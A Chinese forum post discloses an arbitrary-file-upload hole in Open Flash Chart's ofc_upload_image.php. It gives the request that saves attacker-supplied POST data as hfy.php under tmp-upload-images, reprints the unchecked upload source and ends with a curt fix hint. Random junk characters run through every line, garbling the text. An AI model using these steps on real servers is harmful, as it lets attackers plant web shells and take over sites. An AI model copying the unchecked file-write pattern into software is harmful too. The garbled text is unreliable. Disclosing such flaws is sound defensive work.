POST 数据漏洞文件执行任意后缀文件保存
. y Q; a) o3 H' e( T 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
% v G2 x! Q1 F9 P
" [5 Q# o* @0 {8 u2 B- q利用:
) b2 ]: C% T7 J7 ^& R$ `/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名/ v/ d5 C: l- q, w+ b8 m* J( F8 v6 m
. a6 A( p+ v/ Q; x' p
Post任意数据
0 a f6 R* m$ ` [保存位置http://localhost/chart/tmp-upload-images/hfy.php
! z* B$ l3 w) G2 O$ Z
4 l$ W. o% ]! F' \, K2 _8 z: t2 n8 w5 s6 r( r5 R
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
* i' x( Y+ G2 e7 T6 B4 N1 s, A+ p$ h: N) j; C
<?php- c- V; X, B/ U( b. S
3 `( w: o) n, x& Y8 A" J+ D3 {; \9 N
/// g0 \7 P' j1 B. r: j
// In Open Flash Chart -> save_image debug mode, you
# g6 }, S: o# V8 I9 V3 B1 @4 [ p// will see the 'echo' text in a new window.) l* i5 }2 s# {" }/ {' q* w8 J9 \
//8 N+ L9 w! f; E$ d8 m8 s
3 n1 l" G5 O2 T2 m( e1 e/ ^
/*
" }6 e5 B8 H8 D% A8 B7 j! R
6 n+ A( R6 U [- |5 x' F1 P6 B# r( dprint_r( $_GET );
; f/ g: k* p% }- J( d9 K! ]" i6 iprint_r( $_POST );
0 a& d( V: b# ~4 w, Dprint_r( $_FILES );
% ] s J2 W' ~. P
& s- a( Y9 g9 F8 Q! R' @) dprint_r( $GLOBALS );
2 x' \- S+ P6 Sprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );6 x! z6 K; t: J# N1 _' K
9 |2 @; g+ J, k6 q( W* |) n6 }0 t: b7 V
*/
- _9 `+ R; k1 m" U// default path for the image to be stored //; f5 g7 C! x; m4 ]* o7 ~
$default_path = '../tmp-upload-images/';7 r2 u U; i- Y! s" I1 R
! c$ X- f% u( _6 [4 _9 H' t& D8 u4 \if (!file_exists($default_path)) mkdir($default_path, 0777, true);
: z# Z C9 ?" Q4 q
6 ~. J, t }: a# i( I* N// full path to the saved image including filename //5 b6 c* T' {: \/ r
$destination = $default_path . basename( $_GET[ 'name' ] ); ! v; X8 | H, T& O" a
6 _ J' B1 s$ y1 ~7 necho 'Saving your image to: '. $destination;
5 m$ |: `, n! \1 ^: u# z" ^( `// print_r( $_POST );2 o8 W. Z2 Y) O2 U
// print_r( $_SERVER );* y1 j8 k- @; h" h( z
// echo $HTTP_RAW_POST_DATA;
" i3 m' b. l6 L3 ]* t
$ J+ L& u3 Y% ^& A0 g8 j3 w8 b' d- j/// V$ t# \" o) @+ i
// POST data is usually string data, but we are passing a RAW .png
% T7 {0 i: w# o5 N// so PHP is a bit confused and $_POST is empty. But it has saved
7 y5 ]; v W3 Y9 \// the raw bits into $HTTP_RAW_POST_DATA
+ M: ~/ | i: d7 U5 |//0 y/ a/ g1 T1 l. f
4 h( B$ p6 C0 t# U- i q' _
$jfh = fopen($destination, 'w') or die("can't open file");8 Z, P& h. g8 p( {# F
fwrite($jfh, $HTTP_RAW_POST_DATA);
2 U5 x n/ Z4 p6 t; L% F, v ffclose($jfh);) K7 c8 t9 x3 |: d0 }( b3 J! y* K6 O
' y) A6 [* N* c: f) J//
! S$ |. r; S1 T// LOOK:
I) R9 Q2 z8 N//
; p+ w" A' T) {8 s7 m2 r3 rexit();/ `) n# f- C% d* j
//
( c" C- d3 g- o$ s1 j1 E// PHP5:7 S4 G0 ^; C: H8 K& Q( \! D5 o
//
5 R$ g1 k( X- ~9 ]
: `, u8 ?$ x! e: N R4 ^( c1 z9 N4 c$ i
// default path for the image to be stored //2 a0 ^: k! o g( J0 F/ A: B9 ]
$default_path = 'tmp-upload-images/';
8 n9 o2 H" K4 F; R" D' ?/ }$ A( s2 d' A; A5 w( K# l
if (!file_exists($default_path)) mkdir($default_path, 0777, true);2 b4 ]! }; J- Y& ]8 q
& _" A5 U$ {0 ]* V// full path to the saved image including filename //1 b$ y9 R2 |# [9 i
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); & F5 b# u4 U! T- j5 S$ y/ g
0 [' G! q* i6 V9 q8 Z
// move the image into the specified directory //+ H ^5 m: N3 ]/ r' }
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) { r: J. S" ~; _( ^4 l/ s
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
' {( n6 `& x8 r; \+ ^} else {
$ E- k, J$ i& _0 F3 P7 l& b echo "FILE UPLOAD FAILED";
& F7 H* H/ P! [" p9 f}+ j& G$ k- j d1 Z6 Q* e
7 |9 C0 u- U& r: a# f8 q
% C5 j& z, E+ R2 O3 h7 L" \6 f# g& S?>0 w! T4 |) a8 q% x3 d# J
2 i: z% s. B. P' p; n6 a7 C( ~2 Y' u
7 y, \0 {& L% c4 G' J
E# F. n9 u" p% B
" F g) y4 Z2 n2 u8 j( N0 T5 y0 v0 k
修复方案:
/ V( V k8 J: r* T. V+ x5 V5 [ B这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
& S3 g: E4 l1 x0 x7 E# w
+ i! M9 _4 I4 i# h8 b \
3 i. L% a0 K) Z* [" _, F
/ O9 U; c" t/ R. j) g: Y5 V! ~6 U! u+ Q7 L0 R
|